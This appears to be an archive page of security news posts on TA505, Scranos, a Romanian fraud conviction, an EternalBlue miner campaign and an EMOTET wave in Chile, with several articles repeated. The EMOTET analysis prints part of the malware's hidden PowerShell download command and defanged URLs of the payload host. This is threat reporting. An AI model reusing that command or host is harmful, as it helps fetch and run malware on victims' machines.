Category Archives: cyber crime

Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russianbased company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including 
the Dridex banking trojantRAT RAT, FlawedAmmy RAT, 
Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macr. The macro downloads a payload from the command and control (C&C) server, the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018, it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.

TA505

The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.

Security Affairs: Russian TA505 threat actor target financial entities worldwide

Russian financially motivated threat actor TA505 used remote access Trojans (RATs) in attacks on financial entities in the United States and worldwide.

Security experts at CyberInt uncovered a new campaign of a Russian financially motivated threat actor tracked as TA505. The hackers used remote access Trojans (RATs) in attacks aimed at financial entities in the United States and worldwide.

“CyberInt researchers have been tracking various activities following the spear-phishing campaign targeting large US-based retailers detected in December 2018.” reads the analysis published by Cyberint. “The research focused on scenarios with the same tactics, techniques and procedures (TTP) along with the repeated nefarious use of a ‘legitimate’ remote administration tool ‘Remote Manipulator System’ (RMS), developed by a Russianbased company ‘TektonIT’.”

The TA505 group was first spotted by Proofpoint back 2017, it has been active at least since 2015 and targets organizations in financial and retail industries.

The group carried out a large number of campaigns using weaponized Office and PDF documents to deliver notorious malware, including 
the Dridex banking trojantRAT RAT, FlawedAmmy RAT, 
Philadelphia ransomware, GlobeImposter and Locky ransomware.

Tracked by the research community as TA505, the Russian threat group is known for the use of banking Trojans such as Shifu and Dridex, as well as for the massive Locky ransomware campaigns observed several years ago.

In recent attacks the experts observed the group using new backdoors, including the modular tRat and ServHelper.

In campaigns carried out between December 2018 and February 2019, the TA505 group leveraged the Remote Manipulator System (RMS) backdoor to target financial institutions in Chile, India, Italy, Malawi, Pakistan and South Korea, and retailers in the United States.

In December 2018 also targeted large US retailers and organizations in the food and beverage industry with spear-phishing attacks. The phishing messages used a weaponized Word document containing a Visual Basic for Applications (VBA) macr. The macro downloads a payload from the command and control (C&C) server, the last stage of the attack chain is the RMS RAT.

The investigation conducted by the researchers allowed them to uncover other campaigns conducted between December 2018 and March 2019.

Hackers hit targets in many countries worldwide, including Chile, India, Italy, Malawi, Pakistan and South Korea. Researchers believe that other attacks against targets in China, Great Britain, France and the United States could be attributed to the same threat actor.

The weaponized documents used in the attacks leverage Microsoft Windows Installer to fetch a payload from the C2 and execute it.

“This behaviour is consistent with other TA505 campaigns utilising a combination of weaponised Microsoft Office files containing either VBA macros or exploit code to spawn additional processes.” continues the analysis published by Cyberint. “Of the spreadsheet lures analysed in this campaign, four different C2 servers and payloads were identified, with each likely being unique to a specific target organization or victim cluster.”

Experts also observed the attackers using the ServHelper RAT since November 2018, it allows them to set up reverse SSH tunnels for remote access to the compromised machine via RDP.

TA505

The report states that indicators of compromise identified in the campaigns against the US retail campaign are consistent with an attack against the Notary Chamber of Ukraine conducted by the same threat actor in December 2018.

At the time, the threat actor was delivering the RMS Trojan in spear-phishing attack.

Further technical details on the attacks are included in the report published by Cyberint.

Pierluigi Paganini

(SecurityAffairs – hacking, VSDC)

The post Russian TA505 threat actor target financial entities worldwide appeared first on Security Affairs.



Security Affairs

Part One: Understanding cyber security in accountancy

Emmy Hawker takes a deep dive into cyberspace, assessing how prepared accountancy firms and practices are for the ever-growing threat of cyber-crime. In June 2018, the UK’s technology sector was

The post Part One: Understanding cyber security in accountancy appeared first on The Cyber Security Place.

Crooks are selling “Digital Doppelgangers” to bypass anti-fraud protection

By Waqas

Financial Crimes to Reach an Unprecedented High by 2023 if Dark Web marketplaces like Genesis are allowed to Operate- Researchers Claim. According to the latest research from Juniper Research, cybercriminals have developed a wide range of advanced tools to help users evade machine learning-based anti-fraud systems. On the other hand, Kaspersky Lab researchers have identified […]

This is a post from HackRead.com Read the original post: Crooks are selling “Digital Doppelgangers” to bypass anti-fraud protection

Security Affairs: Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading

Scranos is a powerful cross-platform rootkit-enabled spyware discovered while investigating malware posing as legitimate software like video players, drivers and even anti-virus products.

The Scranos rootkit malware was first discovered late last year when experts at Bitdefender were analyzing a new password- and data-stealing operation leveraging around a rootkit driver digitally signed with a stolen certificate. 

Despite the level of sophistication of the threat, the rootkit appears to be a work in progress, experts pointed out that it is continually evolving.”

“Last year, the Bitdefender Cyber Threat Intelligence Lab started analysis of a new password- and data-stealing operation based around a rootkit driver digitally signed with a possibly stolen certificate. The operation, partially described in a recent article by Tencent, primarily targeted Chinese territory until recently, when it broke out around the world.” reads the report published by Bitdefender. Despite the sophistication, this attack looks like a work in progress, with many components in the early stage of development. Although the campaign has not reached the magnitude of the Zacinlo adware campaign, it is already infecting users worldwide.”

Scranos implements a modular architecture, with many components in the early stage of development. Experts reported that it is already infecting users worldwide. It implements features to Extract cookies and steal login credentials from multiple browsers (Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex Browser), steal a user’s payment accounts from his Facebook, Amazon and Airbnb webpages, send friend requests to other accounts and phishing messages using the victim’s Facebook account, it could share malicious APKs, steal login credentials for the user’s account on Steam, as well as download and execute any payload.

The malware is also able to inject JavaScript adware in Internet Explorer, install Chrome/Opera extensions to inject JavaScript adware on these browsers as well, exfiltrate browsing history, silently display ads or muted YouTube videos to users via Chrome, and subscribe users to YouTube video channels.

The malware spreads via Trojanized applications disguised as cracked software, or applications posing as legitimate software such as video players, drivers or even antivirus software. When executed, a rootkit driver is installed to hide the malware and ensure persistence, then it connects the C2 to download and install additional components.

Most of the infections have been observed in India, Romania, Brazil, France, Italy, and Indonesia. According to the experts, the operation is in a consolidation stage, first samples date back to November 2018, with a massive spike in December and January.

“The dropper, which doubles as a password stealer, installs a driver that provides persistence to all other components to be installed in the future. As this paper was written, the digital signature of the driver, issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd, had not been revoked on grounds of obvious fraudulent activity.” continues the repor.t

“The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the Registry,”

scranos rootkit

Below the infection process described by the experts:

  • The dropper steals cookies, login credentials and payment info with the help of specialized DLLs. It supports the most common browsers and targets Facebook, YouTube, Amazon and Airbnb. Data gathered is sent back to the C&C.
  • The dropper installs the rootkit.
  • The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk and a start-up service key is created in the Registry.
  • The rootkit injects a downloader into a svchost.exe process.
  • The downloader sends some info about the system to the C&C and receives download links.

The experts also shared technical details on payloads involved in the campaign:

Extension Installer Payload — This payload installs adware extensions in Chrome used to inject adware scripts in web pages visited by the user.

Browsing History Stealer Payload — This payload collects Chrome’s browsing history and sends it to the C&C in an encrypted form. The data sent to the C2 is encrypted with AES. The main dropper is able to steal browser cookies and login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex. It can also steal cookies and login info from victims’ accounts on Facebook, YouTube, Amazon, and Airbnb.

YouTube subscriber payload — It is basically an adware file that manipulates YouTube pages by using Chrome in debugging mode. Some droppers even install Chrome if it is not installed on the infected machine. The payload hides the Chrome window on the desktop and taskbar, but its process is visible in Task Manager/Process Explorer. The operations are performed through debug commands.

Further technical details on other payloads such as the YouTube subscriber payload, the Facebook Spammer Payload, and the Android Adware App are included in the report published by Bitdefender.

The report also includes the IoCs for this last campaign.

Pierluigi Paganini

(SecurityAffairs – scranos malware, malware)

The post Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading appeared first on Security Affairs.



Security Affairs

Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading

Scranos is a powerful cross-platform rootkit-enabled spyware discovered while investigating malware posing as legitimate software like video players, drivers and even anti-virus products.

The Scranos rootkit malware was first discovered late last year when experts at Bitdefender were analyzing a new password- and data-stealing operation leveraging around a rootkit driver digitally signed with a stolen certificate. 

Despite the level of sophistication of the threat, the rootkit appears to be a work in progress, experts pointed out that it is continually evolving.”

“Last year, the Bitdefender Cyber Threat Intelligence Lab started analysis of a new password- and data-stealing operation based around a rootkit driver digitally signed with a possibly stolen certificate. The operation, partially described in a recent article by Tencent, primarily targeted Chinese territory until recently, when it broke out around the world.” reads the report published by Bitdefender. Despite the sophistication, this attack looks like a work in progress, with many components in the early stage of development. Although the campaign has not reached the magnitude of the Zacinlo adware campaign, it is already infecting users worldwide.”

Scranos implements a modular architecture, with many components in the early stage of development. Experts reported that it is already infecting users worldwide. It implements features to Extract cookies and steal login credentials from multiple browsers (Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex Browser), steal a user’s payment accounts from his Facebook, Amazon and Airbnb webpages, send friend requests to other accounts and phishing messages using the victim’s Facebook account, it could share malicious APKs, steal login credentials for the user’s account on Steam, as well as download and execute any payload.

The malware is also able to inject JavaScript adware in Internet Explorer, install Chrome/Opera extensions to inject JavaScript adware on these browsers as well, exfiltrate browsing history, silently display ads or muted YouTube videos to users via Chrome, and subscribe users to YouTube video channels.

The malware spreads via Trojanized applications disguised as cracked software, or applications posing as legitimate software such as video players, drivers or even antivirus software. When executed, a rootkit driver is installed to hide the malware and ensure persistence, then it connects the C2 to download and install additional components.

Most of the infections have been observed in India, Romania, Brazil, France, Italy, and Indonesia. According to the experts, the operation is in a consolidation stage, first samples date back to November 2018, with a massive spike in December and January.

“The dropper, which doubles as a password stealer, installs a driver that provides persistence to all other components to be installed in the future. As this paper was written, the digital signature of the driver, issued to Yun Yu Health Management Consulting (Shanghai) Co., Ltd, had not been revoked on grounds of obvious fraudulent activity.” continues the repor.t

“The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk, and a start-up service key is created in the Registry,”

scranos rootkit

Below the infection process described by the experts:

  • The dropper steals cookies, login credentials and payment info with the help of specialized DLLs. It supports the most common browsers and targets Facebook, YouTube, Amazon and Airbnb. Data gathered is sent back to the C&C.
  • The dropper installs the rootkit.
  • The rootkit registers a Shutdown callback to achieve persistence. At shutdown, the driver is written to disk and a start-up service key is created in the Registry.
  • The rootkit injects a downloader into a svchost.exe process.
  • The downloader sends some info about the system to the C&C and receives download links.

The experts also shared technical details on payloads involved in the campaign:

Extension Installer Payload — This payload installs adware extensions in Chrome used to inject adware scripts in web pages visited by the user.

Browsing History Stealer Payload — This payload collects Chrome’s browsing history and sends it to the C&C in an encrypted form. The data sent to the C2 is encrypted with AES. The main dropper is able to steal browser cookies and login credentials from Google Chrome, Chromium, Mozilla Firefox, Opera, Microsoft Edge, Internet Explorer, Baidu Browser and Yandex. It can also steal cookies and login info from victims’ accounts on Facebook, YouTube, Amazon, and Airbnb.

YouTube subscriber payload — It is basically an adware file that manipulates YouTube pages by using Chrome in debugging mode. Some droppers even install Chrome if it is not installed on the infected machine. The payload hides the Chrome window on the desktop and taskbar, but its process is visible in Task Manager/Process Explorer. The operations are performed through debug commands.

Further technical details on other payloads such as the YouTube subscriber payload, the Facebook Spammer Payload, and the Android Adware App are included in the report published by Bitdefender.

The report also includes the IoCs for this last campaign.

Pierluigi Paganini

(SecurityAffairs – scranos malware, malware)

The post Scranos – A Cross Platform, Rootkit-Enabled Spyware rapidly spreading appeared first on Security Affairs.

Romanian duo convicted of fraud Scheme infecting 400,000 computers

Two Romanian hackers are convicted of infecting 400,000 computers in the U.S. with malicious code and stole millions of dollars from the victims.

Bogdan Nicolescu and Radu Miclaus are convicted of infecting 400,000 computers, most of them in the U.S.. The malware was developed to steal credentials, financial data, personal information, then the crooks offered them on the dark web marketplaces.

The crooks used malicious emails purporting to be legitimate from such entities as Western Union, Norton AntiVirus and the IRS to spread the malware. The spam messages used an attached file that once executed installed onto their computer.

“The defendants used stolen email credentials to copy a victim’s email contacts.  They also activated files that forced infected computers to register email accounts with AOL.” continues the DoJ. “The defendants registered more than 100,000 email accounts using this method.  They then sent malicious emails from these addresses to the compromised contact lists.  Through this method, they sent tens of millions of malicious emails.”

When victims with infected computers visited websites such as Facebook, PayPal, eBay or others, the defendants would intercept the request and redirect the computer to a nearly identical website they had created.  The defendants would then steal account credentials. 

The two men also advertised fraud using email accounts created using the stolen credentials on behalf of the victims, mined cryptocurrency and stole money and cryptocurrency through credit card fraud.

Romanian Duo cybercrime

The duo has been convicted of conspiracy to commit wire fraud, conspiracy to traffic in counterfeit service marks, aggravated identity theft, conspiracy to commit money laundering, and 12 counts each of wire fraud.

“A federal jury today convicted two Bucharest, Romania, residents of 21 counts related to their scheme to infect victim computers with malware in order to steal credit card and other information to sell on dark market websites, mine cryptocurrency and engage in online auction fraud, announced Assistant Attorney General Brian” reads the press release published by the DoJ.

“According to testimony at trial and court documents, Nicolescu, Miclaus, and a co-conspirator who pleaded guilty, collectively operated a criminal conspiracy from Bucharest, Romania.”

According to the authorities, the Romanian duo, along with a third co-conspirator who has pled guilty, operated their criminal conspiracy from Bucharest since 2007.

Sentencing is scheduled for August 24 before Chief Judge Patricia A. Gaughan in the Northern District of Ohio.

Pierluigi Paganini

(SecurityAffairs – Romanian Duo, cybercrime)

The post Romanian duo convicted of fraud Scheme infecting 400,000 computers appeared first on Security Affairs.

Security Affairs: Romanian duo convicted of fraud Scheme infecting 400,000 computers

Two Romanian hackers are convicted of infecting 400,000 computers in the U.S. with malicious code and stole millions of dollars from the victims.

Bogdan Nicolescu and Radu Miclaus are convicted of infecting 400,000 computers, most of them in the U.S.. The malware was developed to steal credentials, financial data, personal information, then the crooks offered them on the dark web marketplaces.

The crooks used malicious emails purporting to be legitimate from such entities as Western Union, Norton AntiVirus and the IRS to spread the malware. The spam messages used an attached file that once executed installed onto their computer.

“The defendants used stolen email credentials to copy a victim’s email contacts.  They also activated files that forced infected computers to register email accounts with AOL.” continues the DoJ. “The defendants registered more than 100,000 email accounts using this method.  They then sent malicious emails from these addresses to the compromised contact lists.  Through this method, they sent tens of millions of malicious emails.”

When victims with infected computers visited websites such as Facebook, PayPal, eBay or others, the defendants would intercept the request and redirect the computer to a nearly identical website they had created.  The defendants would then steal account credentials. 

The two men also advertised fraud using email accounts created using the stolen credentials on behalf of the victims, mined cryptocurrency and stole money and cryptocurrency through credit card fraud.

Romanian Duo cybercrime

The duo has been convicted of conspiracy to commit wire fraud, conspiracy to traffic in counterfeit service marks, aggravated identity theft, conspiracy to commit money laundering, and 12 counts each of wire fraud.

“A federal jury today convicted two Bucharest, Romania, residents of 21 counts related to their scheme to infect victim computers with malware in order to steal credit card and other information to sell on dark market websites, mine cryptocurrency and engage in online auction fraud, announced Assistant Attorney General Brian” reads the press release published by the DoJ.

“According to testimony at trial and court documents, Nicolescu, Miclaus, and a co-conspirator who pleaded guilty, collectively operated a criminal conspiracy from Bucharest, Romania.”

According to the authorities, the Romanian duo, along with a third co-conspirator who has pled guilty, operated their criminal conspiracy from Bucharest since 2007.

Sentencing is scheduled for August 24 before Chief Judge Patricia A. Gaughan in the Northern District of Ohio.

Pierluigi Paganini

(SecurityAffairs – Romanian Duo, cybercrime)

The post Romanian duo convicted of fraud Scheme infecting 400,000 computers appeared first on Security Affairs.



Security Affairs

Security Affairs: Malware campaign uses multiple propagation methods, including EternalBlue

Hackers are using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

Security experts at Trend Micro have uncovered a malware campaign that is targeting Asian entities using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

The threat actors behind this campaign leveraged the exploit leaked by the Shadow Brokers in 2017, the EternalBlue exploit was exploited by several families of malware, including WannaCry and NotPetya ransomware.

The same campaign was first observed in January by experts at Qihoo 360, at the time attackers hit Chinese targets leveraging the Invoke-SMBClient and the PowerDump open source tools.

Researchers observed that the recent attacks initially targeted Japanese users, later they also hit people in Australia, Taiwan, Vietnam, Hong Kong, and India.

“Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware.” reads the analysis published by Trend Micro.

“The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.”

The malicious code also uses the pass the hash attack method, wherein it authenticates itself to remote servers using the user’s hashed password. The malicious code acquires the hashes stored in the machine by using the Get-PassHashes command, as well as the hashes of the weak passwords listed. The malware used the obtained hashes with the Invoke-SMBClient script to perform various file operations, such as deleting files dropped by older versions of the malware and gaining persistence by adding itself to the Windows Startup folder.

In case the victim has a stronger password, the malware leverages EternalBlue to propagate.

Once the malware has infected a machine, it will download an obfuscated PowerShell script from the command-and-control (C&C) server, that acts as dropper. The script also collects and exfiltrates the machine’s MAC address and the list of installed antimalware software.

“The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.” continues the analysis.

In the next stage, the malware will drop a Trojan strain detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI that gathers other system information, including computer name, machine’s GUID, MAC address (again), OS version, graphics memory info, and system time.

The malware also downloads a PowerShell implementation of a Mimikatz tool, it also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. This component scans IP blocks for vulnerable devices that attempt to exploit by using EternalBlue.

A fifth component is an XMRig Monero cryptominer that is deployed using PowerShell and injected into its PowerShell process using the open source Invoke-ReflectivePEInjection tool.

“Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these.” concludes Trend Micro. “And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.”

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Malware campaign uses multiple propagation methods, including EternalBlue appeared first on Security Affairs.



Security Affairs

Malware campaign uses multiple propagation methods, including EternalBlue

Hackers are using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

Security experts at Trend Micro have uncovered a malware campaign that is targeting Asian entities using the EternalBlue exploit and leveraging advantage of Living off the Land (LotL) obfuscated PowerShell-based scripts to deliver malware and a Monero cryptocurrency.

The threat actors behind this campaign leveraged the exploit leaked by the Shadow Brokers in 2017, the EternalBlue exploit was exploited by several families of malware, including WannaCry and NotPetya ransomware.

The same campaign was first observed in January by experts at Qihoo 360, at the time attackers hit Chinese targets leveraging the Invoke-SMBClient and the PowerDump open source tools.

Researchers observed that the recent attacks initially targeted Japanese users, later they also hit people in Australia, Taiwan, Vietnam, Hong Kong, and India.

“Instead of directly sending itself into all the systems connected, the remote command changes the firewall and port forwarding settings of the infected machines, setting up a scheduled task to download and execute an updated copy of the malware.” reads the analysis published by Trend Micro.

“The malware also uses the pass the hash method, wherein it authenticates itself to remote servers using the user’s hashed password. By using the Get-PassHashes command, the malware acquires the hashes stored in the machine, as well as the hashes of the weak passwords listed. After acquiring the hashes, the malware utilizes Invoke-SMBClient – another publicly available script – to perform file share operations using pass-the-hash.”

The malicious code also uses the pass the hash attack method, wherein it authenticates itself to remote servers using the user’s hashed password. The malicious code acquires the hashes stored in the machine by using the Get-PassHashes command, as well as the hashes of the weak passwords listed. The malware used the obtained hashes with the Invoke-SMBClient script to perform various file operations, such as deleting files dropped by older versions of the malware and gaining persistence by adding itself to the Windows Startup folder.

In case the victim has a stronger password, the malware leverages EternalBlue to propagate.

Once the malware has infected a machine, it will download an obfuscated PowerShell script from the command-and-control (C&C) server, that acts as dropper. The script also collects and exfiltrates the machine’s MAC address and the list of installed antimalware software.

“The downloaded PowerShell is a dropper, responsible for downloading and executing the malware’s components, most of which are copies of itself.” continues the analysis.

In the next stage, the malware will drop a Trojan strain detected by Trend Micro as TrojanSpy.Win32.BEAHNY.THCACAI that gathers other system information, including computer name, machine’s GUID, MAC address (again), OS version, graphics memory info, and system time.

The malware also downloads a PowerShell implementation of a Mimikatz tool, it also attempts to use weak SQL passwords to access vulnerable database servers, executing shell commands using xp_cmdshell upon access. This component scans IP blocks for vulnerable devices that attempt to exploit by using EternalBlue.

A fifth component is an XMRig Monero cryptominer that is deployed using PowerShell and injected into its PowerShell process using the open source Invoke-ReflectivePEInjection tool.

“Considering the increasing popularity of PowerShell and more publicly available open-source codes, we can expect to see more complicated malware like these.” concludes Trend Micro. “And while system information being collected and sent back to the C&C may appear insignificant compared to directly stealing personally identifiable information, system information is unique to machines and may be used to trace, identify, and track users and activities.”

Pierluigi Paganini

(SecurityAffairs – fingerprints, Genesis Store)

The post Malware campaign uses multiple propagation methods, including EternalBlue appeared first on Security Affairs.

Wikileaks founder Julian Assange arrested in London

By Uzair Amir

The United States is now requesting the United Kingdom to extradite Julain Assange. Wikileaks founder Julian Assange, 47, has been arrested by Met Police from the embassy of Ecuador in London after seven years of refuge over a now dropped case of sexual assault. The arrest took place after Ecuadorian president Lenin Moreno withdrew Assange’s asylum for “repeatedly […]

This is a post from HackRead.com Read the original post: Wikileaks founder Julian Assange arrested in London

80 Eye-Opening Cyber Security Statistics for 2019

It’s an interesting and challenging time to be working in the cyber security industry. By and large, research indicates that cybercrime is on the rise — news headlines support these

The post 80 Eye-Opening Cyber Security Statistics for 2019 appeared first on The Cyber Security Place.

[SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of infamous EMOTET malware. This threat is known as a banking trojan malware that collects financial information by injecting malicious code into a computer.

EMOTET has evolved in its delivery, however, this wave was conducted with the most prominent form: inserting malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET had the propose of exfiltrating financial credentials from user’s computers to access financial and banking services geolocated in Chile.

The first phase identified as “__Denuncia_Activa_CL.PDF.bat” is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source-code is obfuscated in order to evade antivirus detection and complicate its analysis.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

The .bat file is a Windows batch script that is responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) dropping the malware itself into the Windows startup folder. Next, the infected machine will reboot and malware becomes persistent in the system startup.

The high-level workflow this campaign is illustrated below.

emotet-diagram

EMOTET was protected with an extreme commercial packer dubbed Themida. Themida introduced an additional protection layer that made it harder to analyze. Other restrictions were also coded to prevent its execution in different types of scenarios. In this case, for instance, malware authors introduced several anti-run specifications related to victims’ geolocation and language preferences — only Spain/Chile computers were compromised.

Themida packer has a large group of specific features that are very appreciated by criminals to protect their threats. For example, it uses VM-protection techniques, debug-protection, virtual machine emulation, anti-monitors techniques, anti-memory patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by The Computer Security Certified Response Team (CSIRT), of the Ministry of the Interior from Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

CSIRT released a comprehensive list of IP addresses that EMOTET signals had to block. A national alert was sent (below) and can be consulted in this URL.

communication

SI-LAB detected that this attack started some days before the alerts were published. Thesecond malware phase (denuncias.rar); which used WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself was uploaded by criminals to the opendir C2 server on March 18th, 2019. We can note below, in Technical  Analysis, that the malware was uploaded again later into another web folder on March 21st — maybe an update/change performed by its operators to improve their functionalities or to fix some bug.

emotet-3

As aforementioned, EMOTET only executes inside victim’s computers with Spain/Chile configured as their primary language and this can be an indicator that points to a global target attack.

After several rounds to understand the malware, we found that some Chile financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-4

When the malware is executed without any restrictions, i.e., upon a non-virtualized environment, some information from the victim’s computer is send to C2 server. Data includes date/hour of infectionremote IP from victim’s computer, OS version andantivirus name.

emotet-5

This information was available online on the opendir C2 server and SI-LAB analysed data in order to understand the total of infections and victims impacted this malicious targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims’ IP addresses, based on their geolocation, that were collected from all the data in the opendir C2 server. Color intensity is correlated with the number of infections, being the darkest red equivalent to 175 infections in Chile.

GeoMap of Threats

EMOTET Victims of Cyber Threat in Chile

As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

Governmental agency CSIRT and Cybersecurity National System from Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned for their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were underlined for the bad reasons — a global cyber threat targeted financial institutions and banks from Chile via EMOTET banking trojan malware.

This campaign was conducted via an initial malscan wave adding malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users where impacted by this wave; 176 only in Chile. This malware is not new and, once gain, the main goal was exfiltration of credentials from user’s to access financial and banking services geolocated in Chile.

The first malware phase identified as “__Denuncia_Activa_CL.PDF.bat” is seen as the maestro of all operations strictly well-planed by criminals. This file was delivered via malscam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make harder its analysis. Figure 1 (below) shows the batch script encoded in Little-endian UTF-16.

emotet-6

Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

After some rounds was possible to get the malware source-code in ASCII. Let’s look below.

Figure 2: EMOTET malware deobfuscated — the first phase.

In general, the malicious batch script performs the following actions:

1. Generates random name to rename the 2nd stage (dropper)

First, the malware generates a random name to rename the 2nd file downloaded from C2 server (the stage that executes the WinRar/Ace vulnerability — CVE-2018-20250). The latter will drop the EMOTET itself onto the Windows startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is download to the victim’s download folder. Next image presents the output generated from the batch file.

emotet-8__

Figure 3: Malware source-code output – the first phase.

2. Drops 2nd stage: PowerShell command is executed to drop the WinRar exploit ‘denuncias.rar’ file.

  1. PowerShell -windowstyle hidden -Command “(New-Object Net.WebClient).DownloadFile(‘%downloadurl%’

The 2nd stage is downloaded from C2 server and is renamed (“25RqcZpQ3.rar”) and placed into “C:\Users\root\Downloads” folder.

emotet-9

Figure 4: Download path – the first phase.

As shown, this file is downloaded from an opendir C2 server. Note that C2 server has available this file in two different directories, namely:

  1. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
  2. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardecoded in 1st stage of malware)
emotet-3
emotet-11

Figure 5: 2nd stage available to download in two different directories.

